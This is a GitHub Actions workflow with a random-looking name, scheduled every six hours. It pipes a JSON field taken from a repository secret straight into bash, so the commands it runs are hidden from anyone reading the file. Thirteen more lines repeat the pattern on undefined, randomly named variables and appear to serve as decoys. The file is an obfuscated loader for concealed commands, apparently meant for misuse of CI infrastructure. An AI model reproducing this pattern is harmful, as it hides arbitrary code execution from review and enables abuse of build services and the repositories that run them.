name: daitaiyang7465

on:
  workflow_dispatch:
  schedule:
    - cron: '36 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: daitaiyang7465
        env:
          zwcs2: ${{ secrets.zwcs2 }}
        run: |
          echo $zwcs2 | jq -r .lva5 | /bin/bash
          echo $q133 | jq -r .rqtfi6 | /bin/bash
          echo $qxty3 | jq -r .u0 | /bin/bash
          echo $bsuv2 | jq -r .at208 | /bin/bash
          echo $wgkns369 | jq -r .fy8 | /bin/bash
          echo $chfxg8 | jq -r .s886 | /bin/bash
          echo $v8795 | jq -r .xip835 | /bin/bash
          echo $aeevx2952 | jq -r .ijh900 | /bin/bash
          echo $pp0 | jq -r .dptc03 | /bin/bash
          echo $xvjj17102 | jq -r .i5269 | /bin/bash
          echo $mf46 | jq -r .x7 | /bin/bash
          echo $vi4 | jq -r .pze895 | /bin/bash
          echo $esk4 | jq -r .jj814 | /bin/bash
          echo $gdkl311 | jq -r .b4351 | /bin/bash

